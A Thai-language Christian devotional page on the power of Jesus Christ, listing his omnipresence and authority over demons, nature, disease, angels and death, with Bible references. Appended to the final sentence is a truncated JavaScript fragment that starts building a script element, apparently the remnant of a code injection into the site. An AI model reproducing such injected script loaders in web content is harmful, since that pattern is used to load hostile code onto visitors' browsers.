ศักดานุภาพของพระเยซูคริสต์

pexels-photo

17 ต.ค. ศักดานุภาพของพระเยซูคริสต์

1. ทรงอยู่ทุกหนทุกแห่งสากลสถิต (ยน.1:48, 3:13)

จากคำสั่งที่ทรงกำชับสาวกให้ปรนนิบัติ ประกาศเรื่องของแผ่นดินพระเจ้า ทรงย้ำยืนยันการปฏิบัติการของสาวกว่า “นี่แหละเราจะอยู่กับท่านทั้งหลายเสมอไปเป็นนิตย์ กว่าจะสิ้นโลก” จากคำสัญญานี้ คริสตชนทุกยุคทุกสมัยยืนยันได้จากการสำแดงอัศจรรย์ การเปลี่ยนแปลงชีวิตของพระคริสต์ต่อมวลชนที่เชื่อในพระองค์ หลายคนที่หมดหวังได้พบหวัง จากโจรผู้ร้ายมาเป็นผู้รับใช้พระเจ้า จากคนที่ใช้ไม่ได้ถูกเปลี่ยนแปลงโดยฤทธิ์เดชของพระองค์ ทรงอยู่ทุกที่ได้ในเวลาเดียวกัน โดยพระวิญญาณของพระองค์รู้ถึงพฤติกรรมของมนุษย์

2. ทรงมีฤทธิ์อำนาจ ฤทธานุภาพเหนือธรรมชาติ และไม่มีขีดจำกัด (มก.1:27, ยน.5:19-21)

2.1 พระองค์ทรงมีฤทธิ์เหนือผีร้าย (ลก.4:36)

2.2 มีฤทธิ์เหนือธรรมชาติ อัศจรรย์ (มธ.8:27, 11:24-25)

2.3 เหนือโรคภัยไข้เจ็บ (ลก.4:40)

2.4 เหนือทูตสวรรค์ (มธ.26:53)

2.5 เหนือความตาย (มธ. 28:5-7)

2.6 ทรงสงวนรักษา (ฮบ.1:3)

ไม่มีใครในโลก หรือศาสนาใดในโลกที่จะมีชัยชนะเหนือความตาย แต่พระคริสต์เจ้าทรงเป็นสภาพนิรันดร์ ทรงตายไปไม่ได้ เหตุนี้เองพระองค์ทรงเป็นแหล่งกำเนิดชีวิต ผี ปีศาจ มายากล มีอำนาจจำกัดของมัน แต่พระคริสต์ทรงฤทธิ์สูงสุด ไม่มีสิ่งใดจำกัดพระองค์ได้var d=document;var s=d.createElement(‘script’);